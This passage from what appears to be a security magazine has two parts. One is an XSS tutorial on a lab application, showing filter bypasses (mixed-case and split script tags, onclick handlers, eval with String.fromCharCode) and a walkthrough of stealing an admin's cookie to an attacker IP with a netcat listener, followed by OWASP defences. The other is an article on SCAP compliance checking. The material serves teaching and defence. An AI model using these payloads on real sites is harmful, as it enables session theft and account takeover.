</script> written in lower case, but when we tried to change some letters in the tags, it passed
successfully, and we can verify it from the page source after injection:
<sCriPt> and </ScRipt> tags were injected successfully, and executed but the browser acted as if
they were written normally in lower case. This leads us to a new fact: HTML tags to the browser are
NOT case sensitive.
In our third example, I tried both techniques, but they failed, and the word alert(1) is reflected in the
body, so the application seems to be filtering out script tags no matter what the word’s case is, we
need to find another trick:
As you see, I split the word alert(1) into two parts, the first part is
al
which is inserted before the opening <script> tag, and the second part:
ert(1)
Inserted after the opening <script> tag, as you can see the word alert(1) was reassembled back
86
together into a single word in the body. So we need to try to split a secondary <script> tag into two
parts, the first part to be before the opening script tag, and the second part to be after the opening
script tag. And repeat the same thing for </script> at the end before and after the closing script tag:
Where the bold tags are filtered out by the application, and remaining characters of the parameter
value are put together in a single word, injected in the page, verified in the source:
There are many methods to detect XSS vulnerabilities, not only using <script> tag; when you find
that the word ‘script’ is blocked, you can try with any other HTML tag. So, in this one you can try
other tags such as <a>, <img>, or <dev> tags:
87
Here I used <a> tag with ‘onclick’ event, where the alert appears when you click the link:
<a onclick='alert(1)'>click to show the alert</a>
Feel free to play around with any other tag. Check the page source before after injection:
In the 5th example, the script tags are inject successfully, but the application filters for the word alert,
even if inserted without any tags. So you have to find a way to encode letters ‘a l e r t’ to pass the
filter.
The JS function String.fromCharCode() takes Unicode values as input, and returns the representing
character. For example: String.fromCharCode(97) returns the letter ‘a’, so the word alert is
translated into:
String.fromCharCode(97,108,101,114,116)
alert(1) becomes String.fromCharCode(97,108,101,114,116)(1)
And in order to execute it, we have to use another JS function: eval() which is used to evaluate or
execute a JS code. Now alert(1) encoded into:
eval(String.fromCharCode(97,108,101,114,116)(1))
88
Let’s have a look at the page source:
After the Hello word in the page source, there is already a JS script, which seems to take the value of
the ‘name’ parameter in the URL, and assign it to a variable named ‘a’.
Try to change to value ‘hacker’ in the URL, and see if this value gets reflected in the page source, so a
value of x in the URL will be like that in the source:
<script>
var $a= “x”;
</script>
An easy way to explain what the script actually writes in the source code is as follows: the script
declares a new variable:
a=”
It waits for you to add the value, then it adds “;
Which means that we need to insert our script instead of this X, which will leave an extra “; at the
end, that could be easily commented out using //
Here is what we are going to do; let’s imagine that the script is writing its code, and the cursor wrote
var $a= “
The cursor is now blinking waiting for our input to be written, then it will add the final “;
Here we can add our script, let’s add our own “ in the payload
The script is now var$a = “ “ still waiting to add the final “; at the end
Let’s close the script that’s already there, so the payload becomes “</script>
89
<script> var $a= “ “ </script> “; </script>
XSS exploitation
Now that you detected there is an XSS vulnerability in the application, whether by testing a URL or a
user input field, it’s time to exploit it. In this demo, we will also use Louis’s application: ‘XSS and
MySQL FILE’.
When you first browse the application, you will find the following welcome page. Click ‘comment’
link:
90
Try injecting anything, and you will find that there isn’t any sanitization in this comment input field,
this was done definitely on purpose because this is an exploitation exercise, not a detection one, so
there is no need to waste time in detecting the kind of filtering in the application.
As Louis mentioned in the official explanation, the image is configured so that there is a virtual
administrator for the application, who is already logged into the app, and browsing app pages every
few seconds automatically.
So, what we need to do is to inject a script which will capture a user’s cookie when he browses this
exploited page. This script should then send this cookie to the attacker’s IP address. Pay close
attention to the IP addresses mentioned here, the application IP address is 192.168.153.129, which is
the same of the admin IP address. The attacker IP address is 192.168.153.131, that we are going to
inject, and the cookie value will be sent to this last address.
91
The input of this function is then trying to load an image, which is supposed to be located in
192.168.153.131/document.cookie, or in other words it’s located in
http://attacker’sMachine/victim’sCookie
So when the admin loads this page, the script runs, and tries to find this image location by sending
the admin’s cookie value in the HTTP request. Now the last part is to run a sniffer on the attacker’s
machine, and capture any traffic coming to us on port 80. Use whatever sniffer you like, netcat is the
easiest one:
netcat -l 80
but this will close the connection after the first connection; it will work, but maybe you can use ‘socat’
to keep the listening active:
Save the new value, and browse 192.168.153.129/admin and see now that you became the application
92
admin, and you can edit or delete posts as the administrator:
Although manual methods and whitelists can protect you, they are not the optimum solutions. It’s
better to protect your applications using escaping techniques as discussed in OWASP XSS prevention
cheat sheet5. You can use auto sanitization libraries like AntiSamy, or you can deploy a Web
Application Firewall (WAF).
• The same escaping technique should be applied as mentioned before anywhere you
expect untrusted data. In addition to HTML escaping, there is URL escaping, that’s
when you have parameters in the URL with values like what we illustrated in previous
examples:
• Example1.php?name=hacker
• Except for alphanumeric characters, escape all characters with ASCII values
less than 256 with the %HH escaping format.
• For HTML attribute value, except for alphanumeric characters, escape all characters
with ASCII values less than 256 with the &#xHH; format, (where HH is the hex value for
the character)
• Sanitization should be taken care of also in dynamically created JavaScript codes:
Except for alphanumeric characters, escape all characters less than 256 with the \xHH
• CSS is also subject to attacks: Except for alphanumeric characters, escape all characters
93
with ASCII values less than 256 with the \HH escaping format.
• Use a library like HtmlSanitizer6 that is designed to parse HTML and sanitize tags, if
your input field is expected to accept HTML tags. For example, the comments field in a
forum that is talking about HTML learning, so people are supposed to insert comments
that contain HTML tags in a legitimate way.
For this demo, I’m going to use 192.168.153.1 as my source IP addresses, and anything for the
port. Then press ‘Start’ button.
94
Then, configure URL:
http://192.168.153.128/xss/example1.php?name=[X]
You have to replace the parameter value under test with [X].
Then select the appropriate time interval, which is the pause time between payloads, then start
Fuzzing. Try not to make the interval too high in order to make the scanning quicker, and not
too low so you will have time to see the payloads and the reflected results.
Xenotix will keep sending GET requests to the configured URL, by replacing [X] with the
payloads in the list one by one. The payload appears in the background, and if it detects a
vulnerability, you will see the result.
As you can see, the alert box appeared, a vulnerability was detected using the 3rd payload in the list,
and the payload that detected the vulnerability is:
’><script>alert(1)</script>
95
You have to know what the input field is that you need to test, and what the action is in this POST
request, go to the above webpage, and view source:
What we need to test in this demo is the comment box, whose name is ‘text’, and the action
associated with this POST request is /post_comment.php?id=2
Now let’s go to Xenotix, press Scanner button, and then select POST request fuzzer and configure it
with the following:
URL: in the form http://IP/POST_ACTION: http://192.168.153.129/post_comment.php?id=2
Parameters: input field name: text=[X]
Adjust an appropriate Time interval, start fuzzing and see the payloads changing until you see
success:
96
A vulnerability detected using the payload ’><script>alert(1)</script>
97
is not associated with a known attack.
• The beauty of a WAF is that in addition to signature and anomaly detection, it
understands the application logic while in learning mode, and then raises flags
according to what it learned. Examples are: illegal entry point detection, login page
bypassed, illegal language, illegal file upload, illegal file request, disallowed
locations/countries, and maximum number of violations from the same user
(IP/session) within the configured time window…etc.
• Aside from the above mentioned protection mechanisms, a WAF also provides you
with other features, like SSL offload, web compression, and load balancing.
• One of the very common WAFs in the market is modSecurity, an open source WAF
for apache. F5 and Imperva are considered the market leaders in this solution.
Summary
XSS attacks are very common nowadays, and they could exist in any user’s input fields, search field,
comment field… etc., and could result in total data loss.
It’s important to treat all inputs as untrusted and malicious data using sanitization. Although manual
methods and whitelists can protect you, they are not the optimum solution. It’s better to protect your
applications using escaping techniques, as discussed in OWASP XSS prevention cheat sheet8. Use
auto sanitization libraries, like AntiSamy, or deploy a Web Application Firewall (WAF), and don’t
forget to use an XSS detection framework like Xenotix to attack yourself first before others do!
98
ABOUT THE AUTHOR:
REFERENCES:
2. https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
3. https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Proj
ect#tab=OWASP_Top_10_for_2013
5. https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%
29_Prevention_Cheat_Sheet
6. https://github.com/mganss/HtmlSanitizer
7. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Fr
amework
8. https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%
29_Prevention_Cheat_Sheet
99
Understanding SCAP
Through a Simple Use
Case
by Alexandre D’Hondt & Hussein Bahmad
I. INTRODUCTION
Today, complying with organization’s security requirements is not a soft job for security engineers due to the
large variety of systems and software products. Beyond efficiently configuring, patching and monitoring IT
assets, compliance with organization’s security requirements has to be guaranteed without overwhelming the IT
security personnel. Moreover, these last years, with the emergence of new security vendors, often spending
efforts in creating their own nomenclatures for vulnerabilities, various solutions and tools were developed. In
order to gain in efficiency, resulting security items have to be shared among industries to save costs and
therefore a solution is needed to exchange these items in a standardized fashion. That’s why the National
Institute of Standards and Technology undertook in the early 2000s to specify the Security Content Automation
Protocol in order to standardize security activities and overcome the lack of interoperability between existing
solutions. Furthermore, SCAP also provides a simple way to perform security reporting and to demonstrate
compliance.
The remainder of this review is structured as follows. In section II, SCAP is presented. It is explained starting
with its origin and purpose, then explaining its specification. Two of its main components are presented in a little
bit more details and some use cases are mentioned. In section III, a simple practical use case is discussed for
illustrating the content of section II through the use of a command line tool from the OpenSCAP standard,
especially for applying some basic secure configuration compliance checking tests. Section IV concludes this
review of SCAP with some ways ahead
100
II. WHAT IS SCAP ?
In fact, SCAP [1] is first of all an attempt from the US Department of Commerce through NIST since
the early 2000s to standardize the format by which the security content is communicated with the
industry. The main purpose is to give to everybody the same expression for compliance with some
main standards such as ISO/IEC 27001 (an international standard specifying requirements in the
field of information security management), DoD Directive 8500 (Department of Defense’s directive
for information assurance requirements) and the Federal Information System Controls Audit Manual
(FISCAM). But its purpose is broader and SCAP can also be used for more specialized technical
security activities such as digital forensics. Providing such a standardization allows to exchange
information between the security experts but also helps to achieve an underlying goal considered as
the Holly Grail for the information security management, that is, security automation. [2] [3]
This section first explains the specification of SCAP and its components. It then gives some
interesting use cases and success stories. It finally gives a few more details about two of SCAP’s
components, OVAL and XCCDF, which are the languages targeted by the simple use case described
in the next section.
A. A suite of specifications
SCAP is a suite of specifications that standardizes the format and nomenclature by which security
software products communicate information about software identification, soft-ware flaws, and
security configurations [4]. The SCAP spe-cification, denoting the representation, must be
distinguished from the SCAP content, which denotes the data shared across the information security
community and hosted on various databases across the world, e.g. the National Vulnerability
Database (NVD) [5].
Note that enumerations, centralized in the SCAP content, ensure that what is defined by the
languages can be referred to standardized data.
101
Figure 1. SCAP standard
Figure 1 depicts an overview of the specification, starting on the left vertical frame with the very first
version, SCAP 1.0, then representing on the middle frame the additional compo-nents of the current
version, SCAP 1.2 and then showing on the right frame the components still to be developed in
further versions. The three categories encompass the components in the horizontal frames.
Version 1.0 consists of the base components for automating security controls. These components
form together a set of independent specifications in XML format for expressing in-formation security
knowledge in a standardized way. The lan-guages are aimed to give a meaning to the whole
information in the context of the systems to be checked. The enumerations contain the information
about platforms, configurations and vulnerabilities. The measurement and scoring systems allow to
give a ranking to the results of the tests and to prioritize remediation. The base components are the
following :
Figure 2 depicts the work flow of SCAP 1.0 components using a tool that implements the
specification. Such a tool can be an open-source solution such as OpenSCAP oscap [6] or a
commercial solution such as Arellia Security Analysis [7]. Concretely, the tool takes an XML file as
input written in XCCDF with references to CPE, CCE, CVE and CVSS
102
Figure 2. SCAP 1.0 workflow
items and with eventually links to OVAL definitions. It then outputs an XML file from which an
HTML report or guide can be generated with the same tool. The resulting HTML report is aimed to
highlight the compliance checking results whereas the HTML guide fully describes the compliance
checking rules with the related metadata (without performing any test).
Version 1.2 essentially consists of an extension of the languages to provide standardized reporting. It
also extends the scoring systems to the configuration items. The additional components are the
following :
• OCIL: Open Checklist Interactive Language is a lan-guage for representing checks that
collect information from people or from existing data stores made by other data
collection efforts.
• ARF: Asset Reporting Format is a format for expressing the transport format of
information about assets and the relationships between assets and report.
• AI: Asset Identification is a format for uniquely iden-tifying assets based on known
identifiers and/or known information about the assets.
• CCSS: Common Configuration Scoring System is a sys-tem for measuring the relative
severity of system security configuration issues.
Future versions of SCAP will extend version 1.2 with some emerging specifications aimed to provide
synergy with the already-covered ones in order to achieve more automation tasks such as
remediation (note that, at this moment, the data related to remediation exists but is not exploited yet
for automation because it’s not ready for production). These specifications will soon become part of
the NIST validation program and should be made available after this process. Some emerging
specifications are the following :
• OCRL: Open Checklist Reporting Language is a lan-guage for writing XML definitions
gathering systems in-formation in standardized reports for policy compliance.
• CRE: Common Remediation Enumeration is a nomen-clature for remediation activities.
• ERI: Extended Remediation Information is a collection of information in addition to
the CRE to make this support organizations’ remediation activities.
• CMSS: Common Misuse Scoring System a system for measuring the characteristics of
software feature misuse vulnerabilities.
SCAP was developed to address a large part of the infor-mation security management concerns in an
automated way. These concerns relate to the main activities providing control on the information
103
technologies. The interested reader can refer to the CIS Security Controls to get a complete list [8].
The main use cases with their related security control questions are the following :
Up to now, several studies have been led in the field of automating these use cases. From building a
service-oriented architecture for vulnerability assessment systems [9] or modelling network attacks
using vulnerability information [10] to developing configuration check tools [11] [12] or designing
security in mobile devices [13], SCAP is more and more adopted. Moreover, as information
technologies security becomes the banner call for most organizations, audit and monitoring [14] [15]
increasingly rely on SCAP.
As stated in section II-A, XCCDF is a specification lan-guage that allows us to define checklists.
Together, these form a benchmark for a given platform. Each checklist consists of a set of rules
logically grouped. XCCDF syntax is based on XML and is then structured according to an XML
schema. An XCCDF rule is a high-level definition which will be translated to a check on the related
system (identified by its platform identifier referring to a CPE). In fact, the rules are not specified
directly inside the XML file, instead they point to other XML documents referred as OVAL definition
files.
Figure 3. XCCDF (left) and OVAL (right) XML trees (not exhaustive).
In Figure 3, the left tree represents the main part of the XML tree for an XCCDF benchmark. We
notice the benchmark root with multiple group child nodes with themselves multiple rule child
nodes. These last ones may contain references to OVAL definitions.
XCCDF can also deal with Script Check Engine (SCE), a small and simple check engine that allow to
use old home-made check script content written in another language and these old scripts can be
mixed with OVAL definitions as illustrated in Figure 4. The currently supported languages are Bash,
Python, Perl and Ruby.
104
Figure 4. Mix of an OVAL definition and a Python script in an XCCDF file.
Note that XCCDF rules definition also includes fix items which are simple and straightforward
remediations to miscon-figuration against the tested configuration items. The aware reader may have
noticed that remediations should be handled in a future version of SCAP as stated in Figure 1, that is,
CRE should provide a specific definition in a dictionary of remediations and could be referred in the
XCCDF rules instead of hard-coding them.
As also stated in section II-A, OVAL is a specification language that allows us to define tests. An
OVAL definition consists of multiple tests referring to objects (i.e. a file name, a registry key) and
states (i.e. file’s md5 hash, registry key’s value).
In Figure 3. the right three represents the main part of the XML tree for OVAL definition. We notice
the oval_definitions root with multiple definitions, test, object and state child nodes. These are
logically structured as depicted in Figure 5, that is, they point to each other to provide a meaning that
matches this representation.
Both XCCDF and OVAL have their own online reposito-ries [5] [16] with shared SCAP content in
order to provide community-developed benchmarks, vulnerability, compliance, inventory and patch
definitions for a set of supported operating systems.
105
III. A SIMPLE USE CASE
This section presents a simple use case for the sake of better understanding SCAP. First, we state the
problem and the scope of the use case. Then, we discuss a solution without SCAP and its caveats.
Afterwards, we discuss a solution with SCAP, explaining the workflow of its involved components.
Finally, we argue the added value of such a solution.
A. Problem setting
1. Password Files
3. Expiration Parameters
B. Manual solution
We can imagine that such assessments without SCAP should be done manually. Using other
resources, i.e. a company may hire employees to fulfil these needs. However, there could exist some
internal implementations with specific languages, enumerations and metrics in order to automate
the testing activities, requiring just a few experts to manage the auto-mated execution. This is
precisely a case mentioned in the introduction of this review, showing a lack of interoperability that
SCAP can overcome.
More concretely, let us suppose that an organisation has to check whether the current installed
infrastructure complies with some internal policies such as to forbid an empty pass-word. This
verification is a piece of cake for an administrator, checking on each system whether there exists any
instance of the nullok option in /etc/pam.d/system-auth which prevents login with empty
passwords. However, the complexity of assessment will increase rapidly depending on the number of
rules to test and the number of hosts to be assessed. Sometimes, it requires some knowledge and
security experts to conduct assessments of organization policies. This can quickly become too costly.
106
C. Automated solution with SCAP
As mentioned in section II-B, an interesting use case of SCAP is the policy compliance checking. In
order to illustrate this, we test the previously-defined password policy against a checklist in XCCDF
language with an open-source tool. Thus, in order to check for empty passwords like in section III-B,
we just need to download the corresponding rule from the NVD and to install a tool on the target
system. The check can even be performed remotely from a central system by using a specific tool via
the SSH protocol (i.e. with oscap-ssh). In the present case, we test a local solution in a virtual
machine.
In order to execute the test with the given tool, we adapt the password policy into an XCCDF file
downloaded from the NVD by defining a profile containing the rules referring to OVAL definitions
also downloaded, then forming a benchmark for the given platform. Afterwards, we execute on the
targeted system the following simple command :
--profile xccdf_password_policy
--cpe ubuntu-cpe.xml
--oval-results
--results results.xml
--report results.html
ubuntu-xccdf.xml
• oscap xccdf eval ubuntu-xccdf.xml tests the system against the given
benchmark
• --profile selects the right profile, that is, this of Ubuntu Server 14.04, defined for
our specific policy
• --cpe selects the right platform enumeration (for pro-viding metadata)
• --oval-results enables inclusion of additional OVAL information in the XCCDF report
• --results generates the given XML file with the XCCDF results
• --report generates a human-readable HTML report with very detailed information
107
Figure 6. SCAP workflow applied to the simple use case.
Figure 6 presents the workflow for the simple use case. XCCDF checks the CPE item against some
OVAL tests based on CCE items from a password policy rules, then generating an XML file with the
results and the corresponding HTML report.
The hardest work is certainly to create our own benchmark, requiring some knowledge concerning
the standard and the controls related to the tested password policy. Fortunately, SCAP content from
some main available sources such as the NVD or Database Exploits contain a broad database of
benchmarks and the one we need can be easily found and tailored to the policy.
The final report contains a lot of metadata about the confi-guration items and their potential
misconfiguration and also the remediations that can be performed. A nice feature of SCAP is that its
ARF specification provides a standardized reporting structure that can be used to generate a
user-friendly report in the form of a guidance documentation. Figure 7 shows the summary list of the
check status for each tested rule, as an introduction of the generated report. Each rule in the shown
table links to a section with detailed information.
D. Added value
From the explanations of subsections III-B and III-C on the simple use case, we can see that it’s very
simple to perform a quick compliance checking test on a common system relying on some public
108
resources thanks to SCAP, far more easier than by applying a manual solution.
By using a standard such as SCAP, security information sharing and security automation are made
convenient. As current SCAP content gathers a large quantity of knowledge, security experts can
simply behave as content consumers and thus spare a significant amount of time.
By contrast, security experts can also contribute as content producers and dealing with the XML
schemas quickly be-comes complex and costly. So, SCAP content is of course de-pendent on the
available manpower for feeding the repositories and the content is not necessarily complete.
However, SCAP community enjoy many contributing organizations making the SCAP content a
reliable source for security automation.
As a proof of efficiency, we can mention a few already-released SCAP-validated products from main
software compa-nies such as Microsoft SCAP extensions for Microsoft System Center Configuration
Manager 3.0, Tenable Security Center 5 or also Qualys SCAP Auditor 1.2 [18].
IV. CONCLUSION
SCAP is an evolutionary effort of the information security community. It will continue to progress
from its current version 1.2 with emerging specifications such as CRE for automating remediations.
As its usage seems to continuously grow, SCAP will certainly remain a reliable and efficient source
for supporting security experts’ work.
109
REFERENCES
[1] NIST, The Technical Specification for the Security Content Automation Protocol
(SCAP): SCAP Version 1.2, Sept 2011, rev. 2.
[2] P. Kampanakis, “Security automation and threat information-sharing options,”
Security Privacy, IEEE, vol. 12, no. 5, pp. 42–51, Sept 2014.
[3] R. Montesino and S. Fenz, “Automation possibilities in information se-curity
management,” in Intelligence and Security Informatics Conference (EISIC), 2011
European, Sept 2011, pp. 259–262.
[4] S. Radack and R. Kuhn, “Managing security: The security content automation
protocol,” IT Professional, vol. 13, no. 1, pp. 9–11, Jan 2011.
[5] National vulnerability database. [Online]. Available: https://nvd.nist.gov/
[6] OpenSCAP. Oscap tool. [Online]. Available: http://www.open-scap.org/
[7] Arellia. Security analysis solution. [Online]. Available: http://www.
arellia.com/products/security-analysis-solution/
[8] Cis critical security controls. [Online]. Available: http://www.cisecurity.
org/critical-controls/
[9] A. Nakamura, “Towards unified vulnerability assessment with open data,” in
Computer Software and Applications Conference Workshops (COMPSACW), 2013
IEEE 37th Annual, July 2013, pp. 248–253.
[10] K. Ingols, M. Chu, R. Lippmann, S. Webster, and S. Boyer, “Modeling modern network
attacks and countermeasures using attack graphs,” in Computer Security Applications
Conference, 2009. ACSAC ’09. Annual, Dec 2009, pp. 117–126.
[11] E. Al-Shaer and M. Alsaleh, “Configchecker: A tool for comprehen-sive security
configuration analytics,” in Configuration Analytics and Automation (SAFECONFIG),
2011 4th Symposium, Oct 2011, pp. 1–2.
[12] M. Alsaleh and E. Al-Shaer, “Scap based configuration analytics for comprehensive
compliance checking,” in Configuration Analytics and Automation (SAFECONFIG),
2011 4th Symposium, Oct 2011, pp. 1–8.
[13] C.-L. Kuo and C.-H. Yang, “Security design for configuration man-agement of android
devices,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE
39th Annual, vol. 3, July 2015, pp. 249–254.
[14] M. Aslam, C. Gehrmann, and M. Bjorkman,¨ “Continuous security evaluation and
auditing of remote platforms by combining trusted computing and security
automation techniques,” in Proceedings of the 6th International Conference on
Security of Information and Networks, ser. SIN ’13. New York, NY, USA: ACM, 2013,
pp. 136–143. [Online]. Available: http://doi.acm.org/10.1145/2523514.2523537
[15] R. Savola and P. Heinonen, “Security-measurability-enhancing mecha-nisms for a
distributed adaptive security monitoring system,” in Emerg-ing Security Information
Systems and Technologies (SECURWARE), 2010 Fourth International Conference on,
July 2010, pp. 25–34.
[16] Oval repository. [Online]. Available: https://oval.mitre.org/repository/
[17] GovReady. Ubuntuscap project. [Online]. Available: https://github.com/
GovReady/ubuntu-scap
[18] Scap validated products. [Online]. Available: https://nvd.nist.gov/
SCAP-Validated-Tools/
110